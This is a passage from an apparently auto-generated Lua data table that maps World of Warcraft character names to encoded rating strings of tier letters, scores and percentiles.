["Healzerg"] = "LT:657/98%LB:596/96%LM:853/98%",
["Fåbulous"] = "LT:597/98%EB:676/92%EM:687/94%",
["Pipy"] = "RT:540/69%LB:699/95%EM:829/89%",
["Jrg"] = "ET:726/91%EB:672/92%EM:735/83%",
["Bootyshocker"] = "LT:512/96%LB:756/97%LM:929/95%",
["Linckeslol"] = "EB:674/91%EM:885/93%",
["Worryz"] = "LT:531/96%LB:717/95%EM:896/94%",
["Stallonewolf"] = "ET:394/89%LB:784/98%LM:953/97%",
["Porelculei"] = "ET:605/80%LB:754/97%LM:940/97%",
["Softie"] = "RT:529/67%EB:545/76%EM:662/92%",
["Devicë"] = "ET:725/94%LB:764/96%LM:944/95%",
["Tyrantbaby"] = "LT:583/98%LB:785/98%EM:911/93%",
["Zàch"] = "ET:732/93%EB:737/93%EM:852/90%",
["Booporoops"] = "LT:783/98%LB:773/98%LM:979/98%",
["Jongunkim"] = "ST:799/99%LB:772/98%EM:861/93%",
["Seigfried"] = "LT:747/95%EB:562/94%LM:908/97%",
["Tarynn"] = "LT:745/96%SB:811/99%LM:961/97%",
["Jjokkom"] = "LT:780/98%SB:802/99%LM:985/98%",
["Gadgeteer"] = "ET:727/93%LB:756/95%EM:914/94%",
["Andeh"] = "ST:802/99%SB:885/99%SM:1035/99%",
["Bigtree"] = "LT:762/96%LB:784/98%EM:501/80%",
["Maeyeong"] = "LT:775/97%LB:766/96%LM:967/97%",
["Emianne"] = "LT:764/97%EB:714/94%LM:965/97%",
["Scrancho"] = "LT:788/98%SB:830/99%SM:1033/99%",
["Nills"] = "ST:797/99%SB:882/99%SM:1019/99%",
["Freefrost"] = "LT:774/97%LB:741/96%EM:813/86%",
["Crateria"] = "ST:798/99%SB:895/99%SM:1088/99%",
["Humanshield"] = "ET:660/87%EB:600/79%",
["Poppa"] = "LT:647/98%EB:751/94%LM:928/95%",
["Wrency"] = "ST:793/99%SB:789/99%LM:946/96%",
["Abusing"] = "LT:771/97%EB:748/94%EM:855/90%",
["Gbr"] = "ET:738/94%EB:730/92%LM:965/96%",
["Orxlayer"] = "LT:481/96%EB:750/94%LM:967/97%",
["Haleah"] = "ET:717/92%SB:802/99%LM:814/97%",
["Gearfried"] = "ET:706/91%EB:677/86%EM:488/81%",
["Rsblitz"] = "ST:697/99%LB:768/96%LM:941/96%",
["Tore"] = "LT:758/96%LB:678/97%UM:201/49%",
["Theprestige"] = "LT:751/95%LB:763/96%LM:945/96%",
["Caml"] = "ST:883/99%SB:840/99%SM:1072/99%",
["Aandidar"] = "LT:773/97%SB:811/99%LM:987/98%",
["Pandajim"] = "LT:758/96%LB:748/97%LM:947/96%",
["Icepk"] = "LT:738/95%EB:726/93%EM:841/89%",
["Frostyftw"] = "LT:756/96%SB:832/99%SM:1095/99%",
["Ezwarmqq"] = "LT:758/96%EB:592/93%SM:1031/99%",
["Cloverx"] = "LT:785/98%EB:753/94%EM:790/90%",
["Rann"] = "ET:673/87%EB:602/93%RM:684/73%",
["Alexandre"] = "LT:778/98%LB:787/98%LM:939/96%",
["Beefygrapes"] = "ET:740/94%EB:749/94%EM:872/91%",
["Cue"] = "ST:834/99%SB:815/99%SM:1017/99%",
["Warships"] = "ET:711/91%EB:710/89%EM:788/82%",
["Delsere"] = "LT:769/97%EB:714/94%LM:933/97%",
["Mebestien"] = "ST:799/99%SB:813/99%SM:1025/99%",
["Zny"] = "LT:747/95%EB:564/80%RM:207/59%",
["Slattseason"] = "ST:869/99%SB:890/99%SM:1082/99%",
["Redbullvodka"] = "ET:710/92%LB:771/97%LM:972/98%",
["Boku"] = "ET:719/92%LB:746/97%LM:954/96%",
["Stish"] = "ST:796/99%LB:594/95%SM:992/99%",
["Surrender"] = "ET:719/92%LB:633/95%EM:873/92%",
["Kineztra"] = "ET:743/94%EB:683/87%EM:879/91%",
["Ariy"] = "LT:759/96%SB:853/99%LM:965/97%",
["Thispirrass"] = "LT:734/95%EB:668/91%EM:707/83%",
["Krultin"] = "LT:774/97%SB:821/99%LM:988/98%",
["Jeatsz"] = "ST:803/99%LB:791/98%EM:789/82%",
["Colty"] = "ET:712/92%EB:712/90%LM:963/97%",
["Kaguraru"] = "LT:788/98%SB:816/99%SM:1030/99%",
["Kkoma"] = "LT:787/98%LB:765/98%LM:936/96%",
["Devava"] = "LT:772/97%LB:748/95%SM:1000/99%",
["Bangbro"] = "ET:725/93%EB:473/85%",
["Escante"] = "LT:753/96%LB:766/96%EM:921/94%",
["Frostywattz"] = "LT:786/98%LB:767/96%LM:955/96%",
["Hollow"] = "ST:805/99%SB:852/99%SM:1058/99%",
["Rhys"] = "ST:805/99%SB:818/99%SM:1004/99%",
["Ipwn"] = "ST:809/99%SB:796/99%SM:1013/99%",
["Obscene"] = "ET:690/90%EB:444/83%UM:385/44%",
["Mariuss"] = "ET:364/91%EB:744/94%LM:931/95%",
["Funkinduncan"] = "ST:707/99%LB:763/96%EM:630/89%",
["Wibbley"] = "LT:815/95%LB:751/97%EM:869/94%",
["Beibei"] = "ET:748/91%LB:629/97%LM:900/96%",
["Morning"] = "ET:667/84%EB:689/92%EM:779/84%",
["Nop"] = "LT:527/96%EB:654/91%EM:777/83%",
["Sinn"] = "LT:521/95%EB:664/90%EM:873/91%",
["Alkaid"] = "RT:574/72%EB:683/93%EM:829/92%",
["Dummyyou"] = "ET:741/90%EB:542/93%EM:700/94%",
["Tauntoffme"] = "RT:407/51%RB:380/54%RM:540/63%",
["Joocyheals"] = "ET:628/80%EB:620/86%EM:777/86%",
["Chronoss"] = "RT:523/68%EB:624/85%LM:909/95%",
["Kava"] = "LT:850/97%LB:752/97%LM:830/98%",
["Milkie"] = "ET:723/89%EB:529/92%EM:808/89%",
["Shekells"] = "ET:789/94%LB:588/95%EM:894/93%",
["Hankjones"] = "LT:817/95%EB:717/94%EM:775/84%",
["Malootar"] = "ST:667/99%EB:465/89%EM:805/90%",
["Bellastream"] = "ET:414/91%EB:544/78%RM:252/58%",
["Stopmyheals"] = "ET:354/86%EB:403/82%EM:830/92%",
["Getowned"] = "LT:541/97%EB:561/94%LM:798/97%",
["Zedic"] = "ET:685/86%EB:668/91%EM:797/86%",
["Fenntron"] = "ET:718/90%EB:633/88%LM:928/96%",
["Djourden"] = "LT:570/97%LB:748/96%LM:939/97%",
["Jauzyheals"] = "ET:464/94%EB:677/93%SM:906/99%",
["Rainbowmos"] = "ET:452/94%LB:549/95%EM:727/80%",
["Bakeman"] = "LT:868/98%LB:647/97%EM:876/91%",
["Asaiya"] = "ET:305/80%EB:614/87%EM:712/94%",
["Bunnéh"] = "ET:709/87%EB:685/93%EM:616/90%",
["Oscurare"] = "LT:857/98%EB:633/86%LM:962/98%",
["Paulie"] = "ET:598/78%RB:327/73%EM:887/93%",
["Priestdaddy"] = "ET:791/94%LB:732/97%LM:901/95%",
["Sinnofpower"] = "ST:806/99%LB:621/96%EM:841/91%",
["Alekzandra"] = "ST:709/99%LB:623/97%LM:831/97%",
["Yiyibaby"] = "ET:661/85%EB:660/92%EM:796/89%",
["Pcbot"] = "ET:779/93%EB:496/90%EM:819/88%",
["Isenderwy"] = "ST:840/99%LB:585/95%EM:886/93%",
["Ballspain"] = "ET:598/76%SB:690/99%EM:802/88%",
["Fastzoomzoom"] = "LT:870/98%LB:754/97%LM:911/96%",
["Alyssabeth"] = "ET:661/83%LB:714/96%EM:853/93%",
["Julielu"] = "ET:621/79%RB:443/61%RM:640/71%",
["Yuzukiyukari"] = "ET:727/89%EB:429/84%RM:639/71%",
["Ekimm"] = "ET:665/83%EB:603/85%EM:556/87%",
["Tysonwinfury"] = "ET:404/91%EB:635/86%EM:839/89%",
["Antagonist"] = "LT:706/98%LB:659/98%EM:853/93%",
["Herschel"] = "RT:232/70%LB:770/98%SM:990/99%",
["Dubies"] = "RT:514/68%EB:692/93%LM:942/97%",
["Zhloe"] = "ET:695/87%EB:557/94%EM:579/89%",
["Koka"] = "RT:530/67%EB:586/83%EM:720/79%",
["Prepix"] = "ET:423/91%EB:624/89%EM:862/92%",
["Diky"] = "ET:382/89%EB:621/86%LM:923/96%",
["Sevi"] = "ET:718/90%EB:597/85%EM:866/94%",
["Shibbey"] = "LT:842/97%EB:635/86%EM:834/88%",
["Envin"] = "ET:329/83%EB:490/90%EM:690/94%",
["Relleum"] = "ET:780/94%LB:772/98%SM:1016/99%",
["Mowgpaladin"] = "ST:704/99%LB:741/97%LM:775/96%",
["Squl"] = "ET:788/94%EB:681/92%EM:878/94%",
["Diredestroyr"] = "ET:365/88%EB:669/93%EM:652/76%",
["Wasted"] = "ET:306/80%EB:646/89%LM:768/96%",
["Fcfc"] = "ET:718/88%LB:711/95%LM:902/95%",
["Linaria"] = "LT:806/95%EB:549/93%EM:815/90%",
["Lela"] = "ET:724/90%EB:692/93%EM:829/88%",
["Holywind"] = "ET:648/81%EB:697/94%EM:878/93%",
["Anioah"] = "ET:673/84%EB:695/94%EM:430/78%",
["Jonhopkins"] = "ET:670/83%EB:622/87%EM:762/86%",
["Lysz"] = "LT:650/98%LB:585/96%LM:720/95%",
["Legislation"] = "ET:771/93%LB:739/97%EM:766/83%",
["Redest"] = "ET:627/83%EB:720/90%EM:889/91%",
["Wonton"] = "ET:689/89%LB:757/95%LM:960/97%",
["Zayle"] = "ET:633/83%LB:744/98%EM:901/92%",
["Habeep"] = "LT:744/95%EB:737/93%EM:944/94%",
["Spaztare"] = "ST:694/99%EB:750/94%EM:905/94%",
["Riajia"] = "ET:709/91%EB:741/93%EM:887/91%",
["Onethirtytwo"] = "ET:667/87%LB:755/95%LM:951/96%",
["Mayfall"] = "ET:734/94%LB:754/95%LM:927/95%",
["Highthc"] = "ET:583/79%EB:718/91%EM:699/93%",
["Getpoked"] = "ET:628/83%EB:745/94%EM:908/92%",
["Matthieu"] = "LT:459/96%LB:770/97%SM:932/99%",
["Punnit"] = "LT:470/96%EB:707/89%EM:711/87%",
["Meduza"] = "ST:760/99%LB:784/98%SM:997/99%",
["Raszar"] = "RT:445/70%EB:734/93%EM:790/83%",
["Sorbate"] = "ET:673/87%LB:760/95%EM:581/85%",
["Cirii"] = "RT:457/65%LB:768/96%EM:908/93%",
["Xiaozai"] = "LT:750/95%LB:756/95%EM:835/87%",
["Lucentnarga"] = "ET:733/93%SB:779/99%LM:934/95%",
["Grayjunior"] = "EB:717/91%EM:803/86%",
["Yody"] = "LT:771/97%SB:759/99%LM:919/95%",
["Transam"] = "ET:622/82%EB:725/92%EM:841/87%",
["Dogfoodlid"] = "RT:520/72%EB:722/92%SM:1011/99%",
["Urthona"] = "ST:805/99%SB:860/99%SM:1013/99%",
["Dunnsco"] = "ET:736/93%EB:749/94%EM:753/93%",
["Mattchamp"] = "LT:759/96%EB:741/93%LM:811/96%",
["Hodeyz"] = "LT:754/95%EB:739/93%LM:956/96%",
["Blaqk"] = "ST:781/99%SB:758/99%LM:890/98%",
["Silentslam"] = "ET:574/78%EB:717/91%EM:704/93%",
["Temphus"] = "ET:671/87%LB:635/95%EM:912/94%",
["Supnod"] = "ET:702/90%LB:756/95%LM:979/98%",
["Soupboy"] = "ST:796/99%SB:837/99%LM:931/96%",
["Drsake"] = "RT:460/65%EB:716/91%RM:464/54%",
["Bakerblades"] = "ET:732/93%LB:754/95%EM:751/81%",
["Quadsa"] = "ET:735/94%LB:703/97%EM:737/80%",
["Villainess"] = "RT:449/61%LB:783/98%LM:938/95%",
["Shinlim"] = "LT:776/98%SB:869/99%SM:1034/99%",
["Sylvetwo"] = "ET:677/89%EB:716/93%EM:835/91%",
["Nailio"] = "LT:621/98%LB:694/97%EM:889/91%",
["Glitterboy"] = "ET:676/89%EB:596/94%LM:962/96%",
["Giliano"] = "ET:261/83%EB:746/94%EM:911/93%",
["Sophittia"] = "ET:720/92%LB:769/97%EM:740/80%",
["Bkz"] = "ET:671/87%EB:745/93%LM:921/95%",
["Kokomah"] = "ET:683/88%EB:731/92%EM:892/91%",
["Gurrs"] = "RT:513/67%EB:591/93%EM:912/93%",
["Gapesmell"] = "ST:691/99%LB:783/98%EM:892/92%",
["Rubbish"] = "LT:757/96%SB:804/99%LM:937/95%",
["Huwa"] = "LT:748/95%EB:748/94%LM:940/95%",
["Kowballs"] = "EB:728/91%EM:922/94%",
["Fazer"] = "RT:536/72%LB:691/97%EM:890/91%",
["Tjtj"] = "ST:828/99%SB:832/99%SM:1094/99%",
["Wannasmashh"] = "ET:282/83%LB:754/95%EM:841/87%",
["Mightyhand"] = "ET:339/90%LB:710/97%EM:918/94%",
["Iamwarthog"] = "LT:600/98%LB:728/98%EM:891/93%",
["Tyrantrogue"] = "LT:747/95%EB:725/92%EM:894/91%",
["Jello"] = "ST:791/99%SB:831/99%SM:1043/99%",
["Vodar"] = "ET:690/89%LB:756/95%LM:956/97%",
["Agonyz"] = "ST:834/99%SB:872/99%SM:1034/99%",
["Guobaorou"] = "LT:757/96%LB:763/96%EM:824/86%",
["Daddý"] = "LT:557/97%LB:648/95%EM:691/92%",
["Mommysgirl"] = "LT:778/97%LB:788/98%LM:943/95%",
["Yukilol"] = "ET:667/86%EB:726/92%EM:753/80%",
["Aentreri"] = "ET:682/88%EB:733/93%EM:815/85%",
["Vroostor"] = "ET:673/87%LB:756/95%EM:861/90%",
["Flicmybic"] = "RT:498/65%EB:733/93%EM:902/92%",
["Graduate"] = "ET:374/92%EB:711/89%EM:862/89%",
["Bubblemilkx"] = "ET:336/89%LB:769/96%EM:911/93%",
["Lylisu"] = "ET:709/91%EB:729/92%LM:946/96%",
["Eridial"] = "ET:691/90%SB:838/99%SM:1033/99%",
["Hercx"] = "LT:572/97%EB:588/93%EM:885/91%",
["Nyella"] = "ET:256/79%EB:696/88%EM:723/93%",
["Laowhy"] = "ET:724/93%LB:726/98%EM:869/90%",
["Ozemandias"] = "LT:653/98%LB:756/97%LM:934/96%",
["Prosecutor"] = "ET:632/92%EB:701/93%LM:923/97%",
["Steamedhamz"] = "ET:603/77%LB:709/95%EM:872/94%",
["Hellementz"] = "RT:592/74%EB:724/94%LM:917/95%",
["Rosalyna"] = "ET:597/75%EB:681/92%LM:732/95%",
["Covex"] = "ET:363/86%EB:385/80%EM:727/81%",
["Geggity"] = "ET:714/88%EB:583/83%EM:718/82%",
["Wisdumb"] = "ST:744/99%EB:674/91%EM:866/91%",
["Wichdogtor"] = "ET:768/92%LB:604/96%EM:851/90%",
["Moosedsneeky"] = "ET:799/94%LB:623/96%EM:864/91%",
["Möshinggoat"] = "ET:311/82%LB:733/96%EM:865/93%",
["Naalar"] = "LB:763/98%SM:988/99%",
["Heeksters"] = "LT:679/98%EB:692/94%LM:810/97%",
["Breezewrath"] = "RT:259/71%EB:557/94%EM:873/91%",
["Rashx"] = "LT:620/98%LB:744/97%SM:927/99%",
["Caprii"] = "ET:653/81%EB:569/94%EM:759/84%",
["Hansen"] = "ET:449/92%LB:638/97%EM:599/89%",
["Scofield"] = "RT:567/71%LB:621/96%EM:766/85%",
["Mariahcarey"] = "ET:719/89%LB:755/98%EM:885/93%",
["Lilchart"] = "EB:540/77%UM:429/46%",
["Electronic"] = "ET:320/80%LB:577/95%LM:941/96%",
["Tophatt"] = "ET:406/89%EB:550/93%EM:633/91%",
["Madlibs"] = "ET:788/93%LB:751/97%LM:774/96%",
["Raydia"] = "RT:521/67%EB:661/90%EM:762/85%",
["Orangecarame"] = "RT:224/64%EB:520/91%LM:923/95%",
["Rivin"] = "RT:185/56%EB:574/94%LM:829/97%",
["Trolbrooke"] = "ET:494/94%SB:723/99%EM:558/87%",
["Gravesow"] = "LT:556/96%EB:633/88%LM:950/98%",
["Vodkacran"] = "ET:781/93%LB:732/97%LM:939/97%",
["Sparkling"] = "ET:777/93%LB:717/96%EM:847/91%",
["Diet"] = "LT:618/98%SB:727/99%LM:933/96%",
["Anidotet"] = "RT:529/67%LB:706/95%EM:887/94%",
["Uxie"] = "RT:533/67%LB:733/97%LM:951/98%",
["Thunderstrck"] = "ET:751/90%LB:625/96%RM:471/55%",
["Anya"] = "ET:728/89%LB:744/97%EM:833/89%",
["Volho"] = "LB:723/95%LM:898/95%",
["Shanrii"] = "ET:658/82%EB:628/88%EM:752/85%",
["Kelthuzard"] = "LT:512/95%LB:638/98%LM:719/95%",
["Dornammu"] = "ET:653/81%EB:698/93%EM:890/94%",
["Dzlol"] = "RT:256/71%EB:644/90%EM:744/84%",
["Flyen"] = "LT:583/97%EB:721/94%EM:880/92%",
["Chuggles"] = "ET:652/81%EB:509/91%EM:856/91%",
["Nurples"] = "RT:504/63%LB:731/95%LM:918/95%",
["Donarktuton"] = "RT:244/69%LB:707/95%EM:849/91%",
["Metalheals"] = "ET:435/91%LB:750/96%EM:912/94%",
["Chickenfat"] = "RT:262/73%EB:670/91%LM:744/96%",
["Wudixiong"] = "RT:570/73%EB:606/85%RM:645/74%",
["Tsari"] = "ST:757/99%EB:669/91%LM:946/97%",
["Fourealz"] = "ET:282/78%EB:683/92%RM:662/70%",
["Frog"] = "ET:392/88%EB:715/94%LM:929/97%",
["Seeketh"] = "UT:223/26%RB:439/62%EM:654/92%",
["Eredyn"] = "EB:646/88%EM:888/93%",
["Quex"] = "LT:850/97%LB:749/97%LM:939/97%",
["Bitsobacon"] = "ET:709/86%EB:708/93%EM:816/87%",
["Shanri"] = "EB:689/93%EM:726/82%",
["Kiwiredox"] = "ET:619/78%EB:589/84%EM:807/87%",
["Moossive"] = "ET:670/82%EB:697/93%EM:735/80%",
["Marlexis"] = "RT:563/72%LB:721/96%EM:714/94%",
["Katsuyumyum"] = "ET:788/93%LB:719/95%EM:872/92%",
["Sanhan"] = "RT:444/55%EB:536/77%EM:753/82%",
["Cavalli"] = "LT:493/95%LB:734/96%LM:825/97%",
["Smsm"] = "ET:659/83%EB:610/85%EM:815/87%",
["Westwoodjr"] = "LT:508/95%LB:740/96%EM:787/85%",
["Effexor"] = "LT:766/97%LB:783/98%LM:971/98%",
["Astaroth"] = "ST:783/99%SB:842/99%SM:1000/99%",
["Dalo"] = "ST:812/99%SB:829/99%SM:996/99%",
["Loq"] = "ST:843/99%SB:827/99%LM:972/98%",
["Zucknorris"] = "ST:853/99%SB:812/99%LM:940/96%",
["Punk"] = "ET:722/92%LB:757/95%LM:931/95%",
["Julíus"] = "LT:783/98%SB:732/99%LM:938/98%",
["Megatftv"] = "ST:866/99%SB:828/99%LM:969/97%",
["Cya"] = "ET:379/93%LB:756/95%LM:936/95%",
["Babycham"] = "LT:754/96%EB:742/94%LM:934/95%",
["Mollymorph"] = "LT:764/97%SB:773/99%SM:949/99%",
["Arthelon"] = "ET:736/93%EB:703/89%LM:963/96%",
["Rooty"] = "ST:794/99%LB:673/98%LM:938/96%",
["Påinkiller"] = "ET:732/93%EB:693/88%EM:690/76%",
["Toweland"] = "ET:724/93%EB:741/93%EM:923/94%",
["Pokwang"] = "ET:737/94%EB:732/92%LM:800/95%",
["Docfocto"] = "ET:674/88%LB:696/97%EM:613/89%",
["Chromagnus"] = "LT:756/96%SB:835/99%SM:1055/99%",
["Rothalack"] = "ET:691/89%EB:709/89%EM:835/87%",
["Trenzo"] = "ET:702/91%LB:754/95%EM:842/87%",
["Onex"] = "ST:851/99%SB:859/99%SM:1017/99%",
["Headfirst"] = "ET:727/93%LB:775/97%LM:935/95%",
["Westify"] = "ET:683/88%EB:711/90%EM:893/91%",
["Moonfooy"] = "ST:721/99%EB:587/93%EM:870/89%",
["Dibul"] = "ST:811/99%SB:834/99%SM:1008/99%",
["Dzuryn"] = "LT:596/98%LB:654/96%EM:911/91%",
["Bishounen"] = "ET:714/92%LB:713/97%EM:500/82%",
["Mihr"] = "ST:853/99%SB:860/99%SM:1041/99%",
["Custardpie"] = "LT:638/98%LB:781/98%LM:799/96%",
["Citrix"] = "ET:735/94%LB:765/96%LM:828/97%",
["Sentessa"] = "LT:772/97%SB:820/99%SM:969/99%",
["Frandnotfood"] = "ST:805/99%LB:787/98%EM:884/90%",
["Coldfront"] = "LT:781/98%SB:804/99%LM:976/98%",
["Raehn"] = "ET:704/91%LB:768/96%LM:938/96%",
["Anasa"] = "LT:776/98%SB:790/99%LM:892/96%",
["Pwniesmagus"] = "LT:774/97%LB:753/95%LM:960/97%",
["Richrad"] = "ST:794/99%LB:730/98%EM:892/92%",
["Hatetoseeit"] = "LT:774/98%LB:775/97%LM:961/97%",
["Meowingtons"] = "LT:761/96%LB:770/97%EM:919/94%",
["Kawaiasuna"] = "ET:733/94%EB:681/91%EM:878/91%",
["Dominion"] = "LT:747/96%LB:765/97%LM:960/98%",
["Antì"] = "ET:584/84%EB:749/94%EM:900/94%",
["Trék"] = "ST:806/99%SB:810/99%SM:998/99%",
["Austrianna"] = "ET:737/94%EB:612/94%LM:760/95%",
["Dãz"] = "ST:800/99%SB:805/99%LM:954/97%",
["Hindrex"] = "ET:660/87%EB:579/82%RM:553/61%",
["Broch"] = "ST:806/99%LB:798/98%LM:947/95%",
["Tacosupreme"] = "ST:789/99%SB:780/99%LM:991/98%",
["Boskazuru"] = "LT:784/98%LB:794/98%SM:1000/99%",
["Hrethric"] = "ET:730/93%EB:710/90%EM:827/88%",
["Azeadeh"] = "LT:771/97%LB:781/98%LM:972/98%",
["Anniey"] = "LT:782/98%LB:743/96%EM:857/90%",
["Stealthsteve"] = "LT:781/98%SB:776/99%EM:908/92%",
["Globaltaunt"] = "LT:746/95%LB:600/95%EM:764/82%",
["Gnomedaddy"] = "LT:746/95%LB:779/98%EM:902/93%",
["Tremens"] = "ST:802/99%LB:789/98%LM:961/97%",
["Sadboyz"] = "LT:769/97%SB:802/99%EM:713/78%",
["Drewpeacack"] = "ST:820/99%LB:787/98%SM:1007/99%",
["Bleaken"] = "LT:749/95%SB:733/99%LM:975/98%",
["Skooma"] = "ET:716/92%EB:720/90%EM:820/85%",
["Hypnotoadd"] = "LT:741/95%LB:786/98%LM:957/97%",
["Ophex"] = "LT:759/96%LB:784/98%LM:946/96%",
["Dragian"] = "ET:656/86%SB:816/99%LM:947/96%",
["Choohc"] = "ST:796/99%SB:729/99%LM:894/96%",
["Swiftsx"] = "LT:783/98%LB:774/97%SM:1041/99%",
["Eily"] = "ET:707/87%RB:511/73%EM:714/82%",
["Hulatang"] = "RT:571/72%EB:596/84%RM:502/59%",
["Dontask"] = "ET:733/90%EB:680/91%LM:909/95%",
["Wingz"] = "ET:723/89%LB:567/95%EM:652/75%",
["Peñe"] = "ET:283/76%RB:371/50%EM:683/75%",
["Noreturn"] = "LT:511/96%EB:553/79%EM:733/84%",
["Sweary"] = "ET:694/86%EB:554/79%RM:527/58%",
["Henix"] = "ET:441/93%EB:565/94%LM:912/96%",
["Grumpymeow"] = "RT:588/74%EB:556/79%RM:623/72%",
["Paladinlore"] = "RT:214/67%EB:692/93%EM:820/86%",
["Sprinkles"] = "ET:357/87%EB:685/92%EM:900/94%",
["Clandisciple"] = "ET:292/80%EB:440/85%RM:484/52%",
["Jesmar"] = "ET:271/75%LB:558/95%EM:830/89%",
["Garrallin"] = "ET:702/87%EB:693/94%LM:921/96%",
["Lovestospwg"] = "ET:721/88%EB:557/77%EM:829/89%",
["Mey"] = "ET:616/79%RB:497/72%EM:727/80%",
["Togedemaru"] = "ET:681/85%LB:747/97%EM:883/93%",
["Sodanickels"] = "ET:604/75%EB:623/86%EM:693/93%",
["Docblaze"] = "ET:596/75%EB:543/75%EM:807/85%",
["Horrifik"] = "ET:717/87%EB:685/92%EM:884/92%",
["Dgol"] = "ET:746/91%LB:628/97%LM:866/98%",
["Superkoko"] = "LT:807/95%EB:695/93%EM:908/94%",
["Raijyuu"] = "RT:512/66%EB:565/81%RM:583/68%",
["Bigdaddy"] = "ET:680/86%EB:557/94%EM:816/87%",
["Hoboheals"] = "ET:622/78%EB:416/83%EM:757/86%",
["Teablack"] = "ET:672/84%LB:582/95%EM:776/86%",
["Cutefatgirl"] = "LT:829/96%EB:701/94%LM:929/96%",
["Jhoira"] = "LT:797/95%EB:678/93%EM:776/87%",
["Fryklos"] = "ET:292/78%EB:700/94%LM:744/96%",
["Kisma"] = "ET:700/87%LB:766/98%SM:1010/99%",
["Slowbrain"] = "ET:606/77%EB:571/82%EM:820/91%",
["Answered"] = "RT:531/68%RB:387/55%RM:472/51%",
["Zito"] = "LT:485/95%LB:592/96%LM:951/97%",
["Discoburrito"] = "ET:712/88%EB:645/89%EM:832/90%",
["Queasy"] = "RT:557/71%LB:580/96%EM:855/91%",
["Mianay"] = "ET:765/92%EB:650/88%LM:923/95%",
["Songdra"] = "RT:513/66%EB:357/76%RM:673/74%",
["Shoknut"] = "ET:720/88%EB:595/83%RM:582/67%",
["Brightpower"] = "LT:799/95%SB:776/99%EM:866/93%",
["Psutony"] = "ET:614/78%EB:502/91%EM:776/85%",
["Temrir"] = "LT:510/95%LB:732/97%EM:871/94%",
["Modzt"] = "ET:766/93%EB:541/93%LM:740/95%",
["Virsta"] = "CT:179/21%RB:475/68%EM:527/85%",
["Gvd"] = "RT:582/74%EB:552/79%UM:363/43%",
["Regifted"] = "ET:649/81%EB:654/91%EM:718/79%",
["Sandyclawz"] = "ET:762/91%EB:709/94%EM:851/90%",
["Jellytotem"] = "ET:757/92%LB:631/98%RM:370/72%",
["Jolaman"] = "LT:834/97%EB:704/94%EM:854/91%",
["Toepher"] = "UT:390/49%EB:677/92%EM:897/94%",
["Sekjr"] = "ET:647/82%LB:707/95%EM:862/93%",
["Canonind"] = "ET:628/79%EB:483/89%UM:249/28%",
["Layia"] = "ET:337/84%EB:668/91%EM:792/86%",
["Wheresmydank"] = "LT:840/97%EB:689/93%EM:788/87%",
["Ravinjar"] = "RT:405/50%RB:488/70%EM:724/83%",
["Rhinö"] = "ST:702/99%LB:777/98%SM:1002/99%",
["Elttab"] = "ET:777/93%LB:748/97%LM:960/98%",
["Ghst"] = "LT:483/95%EB:628/87%EM:852/90%",
["Oneforall"] = "ET:631/79%EB:602/85%EM:789/88%",
["Baptiztaa"] = "ET:759/92%LB:718/95%EM:855/93%",
["Kinas"] = "LT:771/97%EB:742/94%LM:924/95%",
["Alangordon"] = "ST:804/99%SB:838/99%SM:975/99%",
["Nethageraba"] = "ST:793/99%LB:779/98%LM:911/97%",
["Deaprogue"] = "ET:670/86%EB:735/93%EM:904/92%",
["Vinconian"] = "LT:516/97%LB:723/98%EM:801/84%",
["Megashabu"] = "ET:640/84%EB:735/93%EM:783/84%",
["Feydrid"] = "EB:736/92%EM:909/93%",
["Grimly"] = "ET:341/89%SB:806/99%LM:989/98%",
["Liquor"] = "ET:689/92%SB:796/99%LM:835/98%",
["Pyrrha"] = "ET:676/88%EB:753/94%EM:642/90%",
["Rvel"] = "ET:708/91%LB:770/97%SM:925/99%",
["Blade"] = "ET:742/94%LB:754/95%LM:934/95%",
["Gruel"] = "EB:731/92%EM:926/94%",
["Grogin"] = "ET:671/91%SB:817/99%LM:940/98%",
["Trungftw"] = "ET:729/94%LB:791/98%SM:1066/99%",
["Fkbeefball"] = "ET:721/92%EB:737/93%LM:914/95%",
["Yodda"] = "ET:630/82%EB:728/92%EM:797/83%",
["Mamian"] = "ET:739/94%EB:741/94%EM:804/84%",
["Zinrok"] = "ET:664/86%LB:752/95%EM:864/90%",
["Littleyork"] = "LT:772/97%LB:770/97%EM:848/89%",
["Mevus"] = "ET:718/92%LB:758/95%EM:860/89%",
["Doclector"] = "LT:765/96%LB:701/97%EM:898/91%",
["Unknøwn"] = "ET:341/89%EB:728/92%EM:750/79%",
["Drunkensolo"] = "LB:772/97%EM:894/92%",
["Oogsneak"] = "EB:740/93%EM:861/90%",
["Mujerhulk"] = "RT:153/56%LB:764/96%EM:891/91%",
["Erid"] = "ET:706/91%SB:752/99%LM:965/97%",
["Mep"] = "ET:617/82%LB:781/97%LM:948/96%",
["Kàng"] = "ST:800/99%SB:822/99%LM:914/95%",
["Shankngank"] = "ET:394/92%LB:647/95%LM:849/97%",
["Nirawr"] = "ST:816/99%SB:826/99%SM:1140/99%",
["Heaciam"] = "LT:462/96%LB:764/96%LM:929/95%",
["Cowwarrior"] = "ET:605/80%LB:680/96%EM:837/87%",
["Brutality"] = "LT:785/98%LB:782/98%LM:979/98%",
["Shard"] = "ST:796/99%SB:852/99%SM:1003/99%",
["Littlecute"] = "EB:710/90%EM:743/78%",
["Buenbuen"] = "LT:793/98%LB:657/96%LM:967/97%",
["Sapperfapper"] = "ST:748/99%LB:790/98%LM:957/97%",
["Bracy"] = "RT:538/72%EB:723/91%EM:830/88%",
["Nelf"] = "LT:769/97%LB:773/97%LM:950/96%",
["Deadlyhyenas"] = "ET:646/84%EB:735/92%EM:864/88%",
["Averyn"] = "ET:735/94%LB:776/97%LM:947/96%",
["Kaioken"] = "ST:860/99%SB:819/99%SM:1052/99%",
["Jacksally"] = "ET:687/88%EB:734/93%EM:792/83%",
["Imwar"] = "LT:530/97%EB:703/89%EM:513/83%",
["Biteniko"] = "ET:740/94%LB:779/98%EM:863/94%",
["Barnsmasher"] = "ET:704/91%EB:723/91%EM:902/92%",
["Evildark"] = "LT:770/98%LB:781/98%LM:947/97%",
["Hoofe"] = "ET:719/92%EB:730/92%EM:783/84%",
["Cheongi"] = "LT:579/97%LB:779/97%LM:989/98%",
["Evye"] = "ET:424/94%LB:755/95%LM:805/95%",
["Crazydps"] = "ET:384/93%LB:775/97%EM:516/83%",
["Ganksinatra"] = "ET:353/90%EB:745/93%EM:906/92%",
["Drath"] = "RT:496/67%EB:528/89%EM:820/85%",
["Freshprince"] = "LT:600/98%LB:686/97%LM:837/96%",
["Avalnch"] = "EB:703/88%EM:706/75%",
["Locco"] = "ET:734/94%LB:756/95%LM:979/98%",
["Vixi"] = "ET:734/94%LB:728/98%LM:916/97%",
["Protomân"] = "EB:709/89%EM:922/92%",
